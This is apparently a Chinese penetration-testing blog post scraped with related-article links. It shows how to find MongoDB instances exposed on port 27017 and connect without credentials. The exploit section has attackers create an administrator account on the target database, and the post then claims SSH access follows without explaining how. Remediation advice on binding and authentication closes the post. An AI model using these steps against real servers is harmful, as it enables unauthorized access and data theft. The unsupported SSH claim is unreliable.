MongoDB 未授权访问漏洞利用
点击"仙网攻城狮”关注我们哦~
不当想研发的渗透人不是好运维
让我们每天进步一点点
简介
MongoDB是一个基于分布式文件存储的数据库,是一个介于关系数据库和非关系数据库之间的产品,它的特点是高性能、易部署、易使用,存储数据非常方便,默认情况下是没有认证的这就导致不熟悉它的研发人员部署后没有做访问控制导致可以未授权登录。
实战
一、环境安装
当发现该端口对外开放时,使用MongoDB的shell工具mongo可以对未授权访问漏洞进行利用。
可以查看官方安装方法
https://docs.mongodb.com/manual/tutorial/install-mongodb-on-debian/
这边已经整理出kali中安装方法,安装该工具走了不少弯路,遇到各种环境问题。
1.导入MongoDB公共GPG密钥:
wget -qO - https://www.mongodb.org/static/pgp/server-5.0.asc | sudo apt-key add -
如果提示错误运行下面命令之后,重新运行上面命令
sudo apt-get install gnupg
2.创建一个列表文件来配置下载列表和下载源。
echo "deb http://repo.mongodb.org/apt/debian buster/mongodb-org/5.0 main" | sudo tee /etc/apt/sources.list.d/mongodb-org-5.0.list
3.重新加载更新源
sudo apt-get update
4.安装MongoDB的最新稳定版本
sudo apt-get install -y mongodb-org
5.启动进程
sudo systemctl start mongod
如果您在启动mongod时收到类似于以下内容的错误:
Failed to start mongod.service: Unit mongod.service not found.
首先运行以下命令:然后再次运行上面的开始命令,然后再次运行上面的开始命令。
sudo systemctl daemon-reload
6.配置开机自启
sudo systemctl enable mongod
二、漏洞利用
1.扫描或者fofa发现端口或者服务,默认端口27017
2.使用mongo连接数据库
命令格式:mongo --host 目标ip --port 目标端口
3.查看用户、数据库信息等
4.创建系统用户管理员创建一个用户名为myUserAdmin,密码为Passw0rd的系统用户管理员账号
#切换到admin库:
> use admin
switched to db admin#创建用户
> db.createUser({user: "myUserAdmin",pwd: "Passw0rd",roles: [ { role: "userAdminAnyDatabase", db: "admin" } ]}
)#创建成功后提示信息:Successfully added user: {"user" : "myUserAdmin","roles" : [{"role" : "userAdminAnyDatabase","db" : "admin"}]
}
5.ssh直接登录系统,利用完毕。
三、漏洞修复
3.0之前版本的MongoDB,默认监听在0.0.0.0,3.0及之后版本默认监听在127.0.0.1。
3.0之前版本,如未添加用户管理员账号及数据库账号,使用--auth参数启动时,在本地通过127.0.0.1仍可无需账号密码登陆访问数据库,远程访问则提示需认证;
3.0及之后版本,使用--auth参数启动后,无账号则本地和远程均无任何数据库访问权限。
1.如MongoDB只需在本地使用,建议只在本地开启监听服务。
2.如果仅对内网服务器提供服务,建议禁止将MongoDB服务发布到互联网上,并在主机上通过防火墙限制访问源IP。
3.启动基于角色的登录认证功能
往期内容
java JDWP调试接口任意命令执行漏洞
灭世之Apache Log4j2 远程代码执行漏洞
工具篇-BurpSutie Pro 2021.10.1最新版本
更多资讯长按二维码 关注我们
觉得不错点个“赞”呗
MongoDB 未授权访问漏洞利用相关推荐
- ZooKeeper 未授权访问漏洞利用
点击"仙网攻城狮"关注我们哦~ 不当想研发的渗透人不是好运维 让我们每天进步一点点 简介 ZooKeeper是一个分布式的,开放源码的分布式应用程序协调服务,它是一个为分布式应用提 ...
- redis未授权访问漏洞利用
redis是一个key-value存储系统,拥有强大的功能,目前普及率很高,redis是用ansic语言编写,支持网络.可基于内存亦可持久化的日志型.Key-Value数据库,并提供多种语言的APL, ...
- MongoDB未授权访问漏洞记录(端口:27017,37017)
一.漏洞危害 对外开放的MongoDB服务,未配置访问认证授权,无需认证连接数据库后对数据库进行任意操作(增.删.改.查高危动作),存在严重的数据泄露风险. 二.漏洞成因 MongoDB服务安装后,默 ...
- 【渗透】Redis 未授权访问漏洞利用(三种利用方式)
起序:是因为我同学的云服务器被黑了,被挖矿了,原因就是 redis 可以未授权访问,还是 root 级别的,我直接好家伙,整理记录一下. 一.软件环境 虚拟机:VMware Workstation 1 ...
- MongoDB未授权访问漏洞
文章目录 一.漏洞介绍 1.1 漏洞成因 1.2 漏洞危害 二.漏洞利用 三.防御建议 一.漏洞介绍 1.1 漏洞成因 MongoDB服务安装后,默认未开启权限验证.且端口对外开放MongoDB服 ...
- jexboss工具 -- JBOSS未授权访问漏洞利用
其实所有的节日,都不是为了礼物和红包而生,而是提醒我们不要忘记爱与被爱,生活需要仪式感,而你需要的是在乎和关爱... ---- 网易云热评 小受:Ubuntu20 小攻:Kali2020 一.搭建该 ...
- Redis 未授权访问漏洞利用
先上 zmap 这个大杀器大范围找安装 redis 服务的机器,aaa.bbb.0.0 是计划扫描的网络. $ zmap -B 1M -p 6379 aaa.bbb.0.0/16 -o results ...
- 常见未授权访问漏洞详解
参考文章1:二十八种未授权访问漏洞合集(CSDN) 参考文章2:28种未授权访问漏洞(知乎) 参考文章3:未授权访问漏洞总结(freebuf) 参考文章4:常见未授权访问漏洞总结(先知社区) 文章目录 ...
- 漏洞复现 - - - 未授权访问漏洞Redis
目录 一,未授权访问漏洞概述 二,常见的未授权访问漏洞 Redis历史漏洞 三,Redis未授权访问 漏洞信息 Redis 简介 四,环境搭建 漏洞环境搭建 五,漏洞利用方法 实验环境 方法一 编辑 ...
最新文章
- Real World Haskell 第七章 I/O
- linux mv 环境变量,linux环境变量 cp mv 以及文档查看的几个命令
- MySQL 高级 游标介绍
- Blueprint:一个Flash Builder代码示例的扩展
- css 小知识点:inline/inline-block/line-height
- 搜索引擎排序DEMO
- [Ext JS4系列]Ext JS4 入门
- wordpress api ajax,Woocommerce rest api - 在wordpress中通过ajax创建产品
- php 编译原理,php编译原理 - Robin3D的个人页面 - OSCHINA - 中文开源技术交流社区
- 三菱伺服驱动器示例_三菱伺服驱动器 mr-j4-b 用户使用手册 中文高清版.pdf
- Python给指定QQ好友自动发送信息和图片
- java 制作圆形按钮_Java制作圆形按钮
- java web代码及展现_抓网页_面包网_javaWeb展示
- 【经典面试题】小程序与H5、APP、公众号的区别到底是什么?
- 转载自www.dezai.cn 常用sql统计
- 基于 electron 实现简单易用的抓包、mock 工具
- SWE、SET和TE的区别 ——《How Google Tests Software》
- 【中秋征文】手把手教你海面月亮升起中秋节特效制作
- webpack概念以及配置文件详解
- Amber中对体系的距离角度和二面角加以限制
热门文章
- 无人机市场大变局:臻迪“入海”,大疆“上天”
- Java 可重入锁ReenTrant
- 二次剩余推理及其求解过程
- 【Denial-of-Service on FPGA-based Cloud Infrastructures论文笔记】
- Unix/Linux编程:sigaction
- 腾讯视频积分兑换会员怎么用
- 三字经的英文版本(经典爆笑)
- 华硕支持2003服务器主板,原生支持Xeon E3-1200 v5:ASUS 华硕 发布 P10-S 服务器主板...
- Dv-Hop定位算法
- sublime安装emmet插件和一些常用插件和常用快捷键